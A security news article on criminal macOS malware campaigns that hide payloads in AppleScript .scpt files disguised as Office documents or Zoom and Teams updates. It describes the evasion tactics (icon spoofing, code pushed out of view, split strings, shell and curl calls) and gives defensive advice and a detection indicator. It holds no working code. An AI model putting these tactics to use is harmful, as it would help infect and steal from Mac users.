Security researchers are warning of a quiet but significant shift in macOS cyber-threats, as criminals repurpose AppleScript files once used mainly by state-sponsored actors. The technique, now spreading through commodity malware campaigns, is enabling stealthy infections that pose new detection challenges for Apple’s built-in defenses.
A Technique Once Used by APTs Moves Into the Criminal Mainstream
Researchers tracking macOS threat campaigns say AppleScript files with the .scpt extension—long considered a niche intrusion vector—are now appearing across a widening set of commodity malware families. The method, earlier associated with advanced persistent threat groups targeting Apple systems, is being adopted to deliver credential-stealers, fake software updates, and malicious installers disguised as ordinary documents.
Families such as MacSync and Odyssey Stealer have begun packaging payloads inside compiled AppleScript files, often delivered as what look like Zoom or Microsoft Teams update prompts. The shift follows Apple’s August 2024 removal of the “right-click and open” workaround that previously allowed Gatekeeper bypasses. Analysts believe threat actors are experimenting with new user-interaction paths to launch code without triggering standard permission prompts.
Historically, many macOS infections traveled through counterfeit Homebrew installers or disk image (DMG) files designed to lure users into Terminal. Now, attackers are weaponizing .scpt files to recreate similar social-engineering pressure points in a format that feels less suspicious and more aligned with macOS’s own scripting environment.
Disguised Documents, Hidden Commands
One of the most effective tactics observed in recent samples involves bundling .scpt malware inside files designed to mimic everyday office documents. Researchers have found booby-trapped copies labeled Apeiron_Token_Transfer_Proposal.docx.scpt and Stable1_Investment_Proposal.pptx.scpt, as well as fraudulent update scripts such as Zoom_SDK_Update.scpt, MSTeamsUpdate.scpt, and InstallSoftZone.scpt.
Many of these files use custom icons embedded directly into the resource fork, allowing them to appear indistinguishable from real Word, PowerPoint, or installer packages when viewed in Finder. Once opened, macOS launches them in Script Editor by default, displaying several lines of harmless-looking comments above long blank spaces. The actual payload code is pushed far down the window—often out of sight—creating a sense of reassurance.
Victims are then encouraged to click “Run” or press Command-R, believing they are enabling document previews or update processes. Instead, the scripts quietly execute commands such as do shell script or remote curl requests, enabling attackers to fetch secondary payloads or launch hidden installers.
Some samples even deploy additional malicious DMGs, like 888.scpt, while others split payload strings across multiple AppleScript variables to complicate static analysis—an evasion technique more common in PowerShell malware on Windows systems
Detection Gaps Leave macOS Users Exposed
Despite the growing use of .scpt-based delivery mechanisms, researchers say antivirus detection is inconsistent. Several live samples submitted to VirusTotal showed zero detections, underscoring how traditional security tools struggle with compiled AppleScript code and obfuscation techniques.
These limitations have created an opening for threat actors to experiment more aggressively. Analysts have also observed cross-platform behavior patterns—such as modular payload fetching, stealthy shell command execution, and staged delivery—typically associated with more mature malware ecosystems.
Security teams emphasize that monitoring Script Editor–launched processes is critical, as is flagging unexpected network activity or Terminal-related anomalies on macOS endpoints. Event logs showing .docx, .pptx, or .scpt extensions running inside Script Editor should be treated as immediate red flags.
New Defensive Strategies, But an Evolving Threat
Researchers recommend several mitigation steps, beginning with changing the default handler for .scpt and .applescript files to non-executable editors such as TextEdit, reducing the chance of accidental execution. Organizations are also developing custom endpoint detection rules that flag compiled AppleScript event codes—such as “sysoexec,” commonly tied to shell-script execution.
The broader concern, analysts say, is the convergence of scripting abuse and social-engineering techniques. As macOS threat actors borrow enterprise-grade tactics, from embedded payloads to icon-spoofing and Terminal evasion, the traditional assumption that Apple systems are less targeted continues to erode.
For now, researchers are racing to keep pace with an increasingly sophisticated malware landscape—one in which everyday document icons may conceal some of the most quietly effective techniques seen in macOS infections to date.
